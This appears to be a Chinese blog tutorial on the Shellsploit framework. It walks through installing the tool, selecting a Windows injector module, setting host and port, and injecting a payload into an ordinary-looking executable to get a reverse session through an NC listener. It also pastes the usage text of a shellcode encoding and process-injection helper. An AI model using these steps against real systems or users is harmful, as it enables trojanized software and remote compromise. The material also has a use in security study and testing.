Shellsploit注入器简单利用

本文介绍如何使用Shellsploit框架生成自定义shellcode、后门和注入器,并演示了具体的使用步骤,包括安装依赖、配置参数及注入payload等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

 

 

Shellsploit让您为各种操作系统生成自定义的shellcode,后门,注入器。让我们通过编码器对每个字节进行混淆。

github:  https://github.com/vasco2016/shellsploit-framework

依赖安装
root$ sudo pip install capstone
root$ sudo pip install readline(Not necessary for windows coz preinstalled in shellsploit)
root$ sudo pip install pefile
root$ sudo pip install colorama
root$ sudo pip install pylzma

安装
Pip在windows/nix机器上都没有问题安装命令如下:
root$ python setup.py –s/ –-setup install
root$ chmod +x shellsploit (if you are using windows just pass this step)
root$ ./shellsploit

 

1.使用shellsploit可以看到运行界面,其实使用方法和msf类似,差不多!

2.比如我在这里查看injectors注入模块

  1. ssf> show injectors

3.使用injectors模块其中一个

  1. ssf>use injectors/Windows/BFD/Patching

4.查看下他里面有什么选项(其实和msf设置方法差不多)

  1. ssf:injectors/Windows/BFD/Patching > show options

5.剩下的设置file 、host、port 这些选择,进行一些设置,其中的file选择我已经将模板放到了目录当中。

6.进行Payload注入,注入后的模板放入到了—File /root/shellsploit-framework/704125575/ludashi.exe

  1. ssf:injectors/Windows/BFD/Patching > inject

7.使用NC进行监听

8.打开payload得到会话

这里可能有些小小的BUG,但影响并不大我们依然可以得到会话。

 

 
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值